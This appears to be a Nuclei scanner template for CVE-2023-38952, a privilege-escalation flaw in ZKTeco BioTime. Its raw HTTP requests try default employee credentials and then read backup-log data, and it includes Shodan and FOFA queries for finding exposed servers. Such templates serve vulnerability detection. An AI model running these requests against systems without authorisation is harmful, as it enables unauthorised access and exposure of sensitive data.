Description
BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.
BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.
id: CVE-2023-38952
info:
name: ZKTeco BioTime <= 9.0.1 - Privilege Escalation
author: riteshs4hu
severity: high
description: |
BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.
impact: |
Unauthenticated attackers can access sensitive files and credentials, leading to data breach and potential system compromise.
remediation: |
Implement proper authentication and access controls for static file resources, and update to the latest version if available.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-38951
- https://krashconsulting.com/fury-of-fingers-biotime-rce/
- https://github.com/omair2084/biotime-rce-8.5.5/blob/main/biotime_enum.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.3
cve-id: CVE-2023-38952
epss-score: 0.0266
epss-percentile: 0.85243
cwe-id: CWE-552
cpe: cpe:2.3:a:zkteco:biotime:8.5.5:*:*:*:*:*:*:*
metadata:
verified: true
vendor: zkteco
product: biotime
max-request: 12
shodan-query: http.html:"ZKTeco Security"
fofa-query: body="ZKTeco Security"
tags: cve,cve2023,biotime,zkteco,auth-bypass,priv-esc,vkev,vuln
http:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: csrf
group: 1
internal: true
part: body
regex:
- "name='csrfmiddlewaretoken' value='([a-zA-Z0-9]+)'"
- raw:
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
X-CSRFToken: {{csrf}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password=123456&captcha=&login_user=employee
payloads:
user:
- "1"
- "2"
- "3"
- "4"
- "5"
- "6"
- "7"
- "8"
- "9"
- "10"
attack: clusterbomb
stop-at-first-match: true
- raw:
- |
GET /base/dbbackuplog/table/?page=1&limit=1 HTTP/1.1
Host: {{Hostname}}
Accept: application/json
matchers:
- type: dsl
dsl:
- 'contains_all(body, "db_type\":", "backup_file\":")'
- 'contains(content_type, "application/json")'
condition: and
# digest: 490a004630440220773322e197dbee5d43a1fc0a6b121bb770875272df50a7417e3411c1f751194502206223c058f5fb638df51f962c9dda359a4ab75b84a8bce77716f185280b9fc651:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.